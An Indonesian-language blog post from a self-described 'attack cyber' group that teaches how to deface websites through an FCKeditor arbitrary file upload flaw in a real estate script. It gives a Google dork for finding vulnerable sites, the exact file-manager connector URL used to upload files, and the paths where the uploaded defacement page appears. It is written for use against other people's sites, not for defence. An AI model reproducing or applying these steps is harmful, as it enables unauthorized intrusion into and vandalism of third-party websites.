• Deface menggunakan FCKEditor Vulnerability

    Rabu, 10 Mei 2017

    Deface menggunakan FCKEditor Vulnerability

     by Mr.Black Cyber on Wednesday, Mei 10, 2017 In Defacing
                                      


    Author : KaCaK
    HomePage : http://www.griadamlar.com
    Web App.Name : MEFE EMLAK SCRIPT
    Price : N/A
    Version : N/A
    Software: http://emlak.mefe.net/
    Vulnerability Style : File Upload
    Bug : File Upload
    Google Keyword ( Dork ) : inurl:advert_detail.php?id=


    Exploit FCKeditor Artibary File Upload :

     http://Site.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
       

    Contoh kalau sudah di exploit





    hasil defacean kita ada di


    www.site.com/files ( kalo lu rename script pepesan lu jadi index.html)
    www.site.com/files/namascriptlu.html ( kalo lu rename script pepesan lu bebas,contoh: IAC.html )



    Sekian & semoga bermanfaat


         


    • >
    • Deface menggunakan FCKEditor Vulnerability

    Leave a Reply

    Subscribe to Posts | Subscribe to Comments

    • TIME

    pengunjung

    Popular Posts

    Blogger templates

    Cari Blog Ini
    Diberdayakan oleh Blogger.

    Arsip Blog

    About

    Blogger templates

    Blogroll

    - Copyright © Indonesia Attack Cyber - Powered by Blogger - Designed by Farizany Noor -